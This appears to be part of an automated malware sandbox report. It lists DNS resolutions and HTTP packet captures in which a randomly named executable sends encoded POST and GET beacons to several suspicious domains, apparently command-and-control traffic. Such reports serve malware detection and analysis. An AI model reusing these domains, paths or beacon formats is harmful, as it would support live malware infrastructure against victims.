                                                                                                                                        Oct 23, 2024 07:02:16.743635893 CEST1.1.1.1192.168.2.70x240dNo error (0)s3-w.us-east-1.amazonaws.com54.231.164.225A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:16.743635893 CEST1.1.1.1192.168.2.70x240dNo error (0)s3-w.us-east-1.amazonaws.com3.5.25.189A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:16.743635893 CEST1.1.1.1192.168.2.70x240dNo error (0)s3-w.us-east-1.amazonaws.com52.216.147.100A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:16.743635893 CEST1.1.1.1192.168.2.70x240dNo error (0)s3-w.us-east-1.amazonaws.com52.216.38.233A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:16.743635893 CEST1.1.1.1192.168.2.70x240dNo error (0)s3-w.us-east-1.amazonaws.com3.5.30.27A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:16.743635893 CEST1.1.1.1192.168.2.70x240dNo error (0)s3-w.us-east-1.amazonaws.com54.231.129.241A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:49.131774902 CEST1.1.1.1192.168.2.70xef69No error (0)www.joshcharlesfitness.xyzjoshcharlesfitness.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:49.131774902 CEST1.1.1.1192.168.2.70xef69No error (0)joshcharlesfitness.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:49.131774902 CEST1.1.1.1192.168.2.70xef69No error (0)joshcharlesfitness.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:50.079823971 CEST1.1.1.1192.168.2.70x60f9Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:03:05.295717001 CEST1.1.1.1192.168.2.70xbfd3No error (0)www.facaicloud.top74.48.31.123A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:03:26.487673998 CEST1.1.1.1192.168.2.70xebeNo error (0)www.98080753.xyz161.97.168.245A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:03:40.723815918 CEST1.1.1.1192.168.2.70x5c57No error (0)www.wcp58.topwcp58.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:03:40.723815918 CEST1.1.1.1192.168.2.70x5c57No error (0)wcp58.top154.23.184.240A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:03:55.793108940 CEST1.1.1.1192.168.2.70xe892No error (0)www.cpamerix.online194.58.112.174A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:04:09.775509119 CEST1.1.1.1192.168.2.70xc31aNo error (0)www.lotus9.lifelotus9.lifeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:04:09.775509119 CEST1.1.1.1192.168.2.70xc31aNo error (0)lotus9.life3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:04:09.775509119 CEST1.1.1.1192.168.2.70xc31aNo error (0)lotus9.life15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:04:24.374213934 CEST1.1.1.1192.168.2.70x80No error (0)www.g4s7e5.biz203.90.227.88A (IP address)IN (0x0001)false

                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                        • bitbucket.org
                                                                                                                                        • bbuseruploads.s3.amazonaws.com
                                                                                                                                        • www.joshcharlesfitness.xyz
                                                                                                                                        • www.facaicloud.top
                                                                                                                                        • www.98080753.xyz
                                                                                                                                        • www.wcp58.top
                                                                                                                                        • www.cpamerix.online
                                                                                                                                        • www.lotus9.life

                                                                                                                                        HTTP Packets

                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        0192.168.2.7498783.33.130.19080484C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:02:49.148719072 CEST495OUTGET /f2m8/?fvM8Gh=q8u1m2y9j/W78LyjRjBmLFBPluC1hJa5ZcIT7WbQRmUkJn/aUKn129a9SdOjfVpEuogWIbFDr3wrvEdEbURHbL899LelzoXXcWM6JsFHtDa1nH+G65yTIIp51Lx0C7/dwS8TcymTUlcC&DfDx=AFrxfzcH-Ld HTTP/1.1
                                                                                                                                        Host: www.joshcharlesfitness.xyz
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Connection: close
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Oct 23, 2024 07:02:49.812549114 CEST419INHTTP/1.1 200 OK
                                                                                                                                        Server: openresty
                                                                                                                                        Date: Wed, 23 Oct 2024 05:02:49 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 279
                                                                                                                                        Connection: close
                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 66 76 4d 38 47 68 3d 71 38 75 31 6d 32 79 39 6a 2f 57 37 38 4c 79 6a 52 6a 42 6d 4c 46 42 50 6c 75 43 31 68 4a 61 35 5a 63 49 54 37 57 62 51 52 6d 55 6b 4a 6e 2f 61 55 4b 6e 31 32 39 61 39 53 64 4f 6a 66 56 70 45 75 6f 67 57 49 62 46 44 72 33 77 72 76 45 64 45 62 55 52 48 62 4c 38 39 39 4c 65 6c 7a 6f 58 58 63 57 4d 36 4a 73 46 48 74 44 61 31 6e 48 2b 47 36 35 79 54 49 49 70 35 31 4c 78 30 43 37 2f 64 77 53 38 54 63 79 6d 54 55 6c 63 43 26 44 66 44 78 3d 41 46 72 78 66 7a 63 48 2d 4c 64 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?fvM8Gh=q8u1m2y9j/W78LyjRjBmLFBPluC1hJa5ZcIT7WbQRmUkJn/aUKn129a9SdOjfVpEuogWIbFDr3wrvEdEbURHbL899LelzoXXcWM6JsFHtDa1nH+G65yTIIp51Lx0C7/dwS8TcymTUlcC&DfDx=AFrxfzcH-Ld"}</script></head></html>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        1192.168.2.75963374.48.31.12380484C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:03:05.315924883 CEST751OUTPOST /dc1u/ HTTP/1.1
                                                                                                                                        Host: www.facaicloud.top
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Origin: http://www.facaicloud.top
                                                                                                                                        Content-Length: 219
                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Referer: http://www.facaicloud.top/dc1u/
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Data Raw: 66 76 4d 38 47 68 3d 53 48 49 70 6f 65 59 2b 53 54 54 53 6b 35 68 33 6a 6a 33 69 52 58 74 6e 73 33 44 67 39 34 43 61 4d 66 4b 6a 55 56 64 62 74 41 6d 6b 48 79 58 42 57 65 2f 42 78 33 4e 4b 6b 52 4a 52 35 49 7a 2f 31 4d 7a 59 76 64 4c 43 74 46 77 39 74 6a 63 6c 6c 62 52 48 69 56 43 35 48 4c 44 61 51 70 45 43 42 57 53 6d 59 33 51 72 4a 7a 4b 43 4a 30 78 6d 38 74 4c 58 71 62 37 4c 44 4b 63 53 77 59 36 58 48 73 41 4e 4a 67 69 41 78 44 63 4a 62 76 48 57 76 76 6e 75 58 51 6e 38 65 37 41 65 41 41 38 49 2b 71 41 4b 79 4d 45 61 73 58 70 36 77 4a 70 42 35 33 49 4e 6b 2b 62 31 67 48 6a 34 6d 5a 57 58 6c 6c 6a 6c 68 43 78 51 4f 45 43 73 68 74 38 74 57 51 3d 3d
                                                                                                                                        Data Ascii: fvM8Gh=SHIpoeY+STTSk5h3jj3iRXtns3Dg94CaMfKjUVdbtAmkHyXBWe/Bx3NKkRJR5Iz/1MzYvdLCtFw9tjcllbRHiVC5HLDaQpECBWSmY3QrJzKCJ0xm8tLXqb7LDKcSwY6XHsANJgiAxDcJbvHWvvnuXQn8e7AeAA8I+qAKyMEasXp6wJpB53INk+b1gHj4mZWXlljlhCxQOECsht8tWQ==


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        2192.168.2.75964474.48.31.12380484C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:03:07.876691103 CEST771OUTPOST /dc1u/ HTTP/1.1
                                                                                                                                        Host: www.facaicloud.top
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Origin: http://www.facaicloud.top
                                                                                                                                        Content-Length: 239
                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Referer: http://www.facaicloud.top/dc1u/
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Data Raw: 66 76 4d 38 47 68 3d 53 48 49 70 6f 65 59 2b 53 54 54 53 6c 64 6c 33 76 6b 6a 69 58 33 74 6b 77 6e 44 67 30 59 44 54 4d 66 47 6a 55 52 4e 4c 75 79 43 6b 48 57 54 42 58 61 72 42 69 48 4e 4b 38 42 4a 55 33 6f 79 7a 31 4d 76 36 76 63 33 43 74 46 6b 39 74 69 73 6c 6c 73 46 59 7a 56 43 37 4c 72 44 59 61 4a 45 43 42 57 53 6d 59 33 45 46 4a 7a 53 43 4b 41 31 6d 38 50 76 55 30 4c 37 49 4b 71 63 53 39 34 36 54 48 73 41 6a 4a 68 2b 71 78 42 6b 4a 62 74 66 57 76 36 54 74 4f 41 6e 32 44 72 41 41 42 44 55 48 6e 49 63 6c 39 4d 63 41 68 31 31 44 78 2f 30 6a 6a 56 45 68 36 76 6a 4f 6b 46 48 4f 78 2f 4c 69 6e 6b 6e 39 73 67 46 78 52 7a 6e 47 73 2f 64 70 41 6f 54 69 66 74 47 42 30 64 70 36 67 73 6c 62 58 61 74 36 4c 37 67 3d
                                                                                                                                        Data Ascii: fvM8Gh=SHIpoeY+STTSldl3vkjiX3tkwnDg0YDTMfGjURNLuyCkHWTBXarBiHNK8BJU3oyz1Mv6vc3CtFk9tisllsFYzVC7LrDYaJECBWSmY3EFJzSCKA1m8PvU0L7IKqcS946THsAjJh+qxBkJbtfWv6TtOAn2DrAABDUHnIcl9McAh11Dx/0jjVEh6vjOkFHOx/Linkn9sgFxRznGs/dpAoTiftGB0dp6gslbXat6L7g=


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        3192.168.2.75965074.48.31.12380484C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:03:10.430186033 CEST1784OUTPOST /dc1u/ HTTP/1.1
                                                                                                                                        Host: www.facaicloud.top
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Origin: http://www.facaicloud.top
                                                                                                                                        Content-Length: 1251
                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Referer: http://www.facaicloud.top/dc1u/
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Data Raw: 66 76 4d 38 47 68 3d 53 48 49 70 6f 65 59 2b 53 54 54 53 6c 64 6c 33 76 6b 6a 69 58 33 74 6b 77 6e 44 67 30 59 44 54 4d 66 47 6a 55 52 4e 4c 75 79 4b 6b 47 6a 48 42 56 34 44 42 68 48 4e 4b 30 68 4a 56 33 6f 7a 70 31 4d 6e 2b 76 63 37 53 74 48 63 39 74 45 34 6c 6e 5a 35 59 36 56 43 37 57 37 44 62 51 70 46 4b 42 57 43 69 59 33 55 46 4a 7a 53 43 4b 42 46 6d 72 4e 4c 55 32 4c 37 4c 44 4b 63 65 77 59 36 76 48 73 49 56 4a 68 36 51 79 78 45 4a 59 4e 50 57 74 49 37 74 47 41 6e 77 41 72 42 54 42 44 4a 48 6e 4a 77 70 39 50 41 6d 68 31 4e 44 38 6f 42 75 79 57 31 36 76 2b 2f 31 37 54 58 70 37 64 44 49 67 6d 37 67 6d 54 70 71 62 42 72 6f 69 5a 73 67 42 4a 75 30 44 2b 2b 51 34 4a 46 30 6c 6f 77 65 46 6f 52 65 49 50 66 51 33 4e 44 74 32 75 2b 68 78 4b 6b 4c 74 79 65 6f 43 35 4b 4f 37 6e 45 78 6d 73 61 4d 56 70 4e 69 33 32 64 77 41 38 4b 63 35 79 6a 37 4f 43 45 39 7a 6f 50 69 33 49 30 4a 37 75 70 72 59 6b 2f 56 71 55 52 30 37 63 33 6b 54 61 73 71 78 2f 59 78 51 36 46 74 57 4e 66 62 75 51 76 72 66 30 35 36 46 4f 59 [TRUNCATED]
                                                                                                                                        Data Ascii: fvM8Gh=SHIpoeY+STTSldl3vkjiX3tkwnDg0YDTMfGjURNLuyKkGjHBV4DBhHNK0hJV3ozp1Mn+vc7StHc9tE4lnZ5Y6VC7W7DbQpFKBWCiY3UFJzSCKBFmrNLU2L7LDKcewY6vHsIVJh6QyxEJYNPWtI7tGAnwArBTBDJHnJwp9PAmh1ND8oBuyW16v+/17TXp7dDIgm7gmTpqbBroiZsgBJu0D++Q4JF0loweFoReIPfQ3NDt2u+hxKkLtyeoC5KO7nExmsaMVpNi32dwA8Kc5yj7OCE9zoPi3I0J7uprYk/VqUR07c3kTasqx/YxQ6FtWNfbuQvrf056FOYErCDfS9GQGYWnJQMLAeSVIs9CHSLELZ5RCp2PeAyPXCnOzxtbOG+cWVUWZKLQkdBPlhSINgVEBoCw1EF/Uc5dp4XiBeuOBkyAklNLIF8S5xcJnrASjc2tXMmUX61i73JvyrrZ9Tf6Q/pZeFKZFWOpsUqEdKEwGHTyk76SgQKaq6DSpBXyM4icYZH8sWwUJytR1jr5q0ibZ37fdZHlOzRaSe3apSCuFhUtIF375DaYpAlLgR7qgonemkcskPVIp8FmkpK7vxWrJiCUsoz6OLQgkj+3eRtbtTd7I8tt+Ox7+hjmOf67rySZ5g3SmRFjWWgklnR6cdm5HS0VrhxZtQmYaIscek7Zu7fVzulF+zA3eaSHM0xg3JciJyQSZPXnaaKOmkqcBcB4cUvXh35eHesRQ1mHIrrOKy0NQ3TxcdZtBq0IHHwsMnbgjkNBN123Fu5FxvRiiKgQXT+a+F3TPwY09xcwIDiZFq4q26Gduyo74Se8gKxL8ButpNoITYCvRC821AAbfi5I4SOQBi3imqrhywB9sLkcVM3med1lKEu5T4XsCyaRnadnCuU+BNouFtXzD6GoQF/l1R+rj47W+3K72AZu4OkN0x/ajdPX6PLhty1FIuzIBU+K7h9nsKRmp0cwxIDMDusj1d+KUm1cxR+Xp+Cqb0SAVITzQ [TRUNCATED]


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        4192.168.2.75965174.48.31.12380484C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:03:12.980887890 CEST487OUTGET /dc1u/?fvM8Gh=fFgJrpU7aD7UkZlQpUegXiYX0mHuwd+xKsDAURMBiAqiBmSaSKvvh09Aihxa8ofx/ezcm777pnsov1VcpLBlwmC3Iqy+K+pafl2LF2kBMm3CKkFZyMytkoTfA5EUxo7rNsMcOhPX02Mw&DfDx=AFrxfzcH-Ld HTTP/1.1
                                                                                                                                        Host: www.facaicloud.top
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Connection: close
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        5192.168.2.759652161.97.168.24580484C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:03:26.508106947 CEST745OUTPOST /eth5/ HTTP/1.1
                                                                                                                                        Host: www.98080753.xyz
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Origin: http://www.98080753.xyz
                                                                                                                                        Content-Length: 219
                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Referer: http://www.98080753.xyz/eth5/
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Data Raw: 66 76 4d 38 47 68 3d 6d 4e 52 76 37 4a 35 73 58 56 2b 6a 50 65 6b 4f 52 55 74 56 38 5a 62 2f 51 62 55 69 46 78 69 67 6a 43 2b 4b 53 65 67 4d 6d 47 75 55 78 36 4c 36 67 4b 36 65 57 2b 4d 4a 77 54 42 48 4d 65 31 31 56 5a 55 6c 6f 4f 6b 31 43 79 75 33 51 30 6d 73 36 4c 55 47 55 4a 7a 50 5a 54 36 64 6f 6e 63 6b 41 49 56 35 47 57 49 47 2b 77 54 76 57 30 73 36 48 47 62 68 36 4b 31 31 4a 6e 46 61 49 62 37 4e 61 76 66 76 6c 39 34 76 31 4d 4d 2b 57 49 76 39 67 69 67 6c 52 7a 44 34 53 66 4a 30 47 6c 76 5a 4b 39 46 43 4f 4d 4d 70 66 4a 6f 55 66 58 58 66 50 6f 69 76 4d 33 6a 32 69 50 51 51 45 4b 59 61 4c 63 33 38 69 37 72 76 45 46 63 61 6e 2f 63 6d 59 77 3d 3d
                                                                                                                                        Data Ascii: fvM8Gh=mNRv7J5sXV+jPekORUtV8Zb/QbUiFxigjC+KSegMmGuUx6L6gK6eW+MJwTBHMe11VZUloOk1Cyu3Q0ms6LUGUJzPZT6donckAIV5GWIG+wTvW0s6HGbh6K11JnFaIb7Navfvl94v1MM+WIv9giglRzD4SfJ0GlvZK9FCOMMpfJoUfXXfPoivM3j2iPQQEKYaLc38i7rvEFcan/cmYw==
                                                                                                                                        Oct 23, 2024 07:03:27.366059065 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Wed, 23 Oct 2024 05:03:27 GMT
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: close
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        ETag: W/"66cd104a-b96"
                                                                                                                                        Content-Encoding: gzip
                                                                                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                                        Oct 23, 2024 07:03:27.366120100 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        6192.168.2.759653161.97.168.24580484C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:03:29.054960012 CEST765OUTPOST /eth5/ HTTP/1.1
                                                                                                                                        Host: www.98080753.xyz
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Origin: http://www.98080753.xyz
                                                                                                                                        Content-Length: 239
                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Referer: http://www.98080753.xyz/eth5/
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Data Raw: 66 76 4d 38 47 68 3d 6d 4e 52 76 37 4a 35 73 58 56 2b 6a 41 65 55 4f 54 33 31 56 72 70 62 38 4f 72 55 69 4d 52 69 38 6a 43 79 4b 53 66 30 6c 6e 30 4b 55 79 62 62 36 68 4c 36 65 58 2b 4d 4a 6b 44 42 43 42 2b 31 75 56 59 6f 74 6f 4c 63 31 43 79 36 33 51 31 57 73 76 6f 4d 46 55 5a 7a 4a 55 7a 36 62 72 58 63 6b 41 49 56 35 47 57 4e 6a 2b 77 72 76 57 45 38 36 56 6a 37 69 38 36 31 30 4d 58 46 61 4d 62 37 4a 61 76 65 38 6c 38 6b 57 31 50 30 2b 57 4a 66 39 6a 7a 67 6d 66 7a 44 2b 59 2f 49 52 58 30 4f 43 44 59 6b 39 4b 63 59 75 54 5a 77 69 58 42 4b 39 56 4b 75 44 53 6d 62 4e 6d 4e 30 6d 54 73 46 76 4a 64 7a 6b 76 5a 66 4f 62 79 35 77 71 74 39 69 4f 4a 76 67 73 6c 34 36 44 2f 69 4e 69 2b 31 6d 2f 48 77 70 46 35 4d 3d
                                                                                                                                        Data Ascii: fvM8Gh=mNRv7J5sXV+jAeUOT31Vrpb8OrUiMRi8jCyKSf0ln0KUybb6hL6eX+MJkDBCB+1uVYotoLc1Cy63Q1WsvoMFUZzJUz6brXckAIV5GWNj+wrvWE86Vj7i8610MXFaMb7Jave8l8kW1P0+WJf9jzgmfzD+Y/IRX0OCDYk9KcYuTZwiXBK9VKuDSmbNmN0mTsFvJdzkvZfOby5wqt9iOJvgsl46D/iNi+1m/HwpF5M=
                                                                                                                                        Oct 23, 2024 07:03:29.881151915 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Wed, 23 Oct 2024 05:03:29 GMT
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: close
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        ETag: W/"66cd104a-b96"
                                                                                                                                        Content-Encoding: gzip
                                                                                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
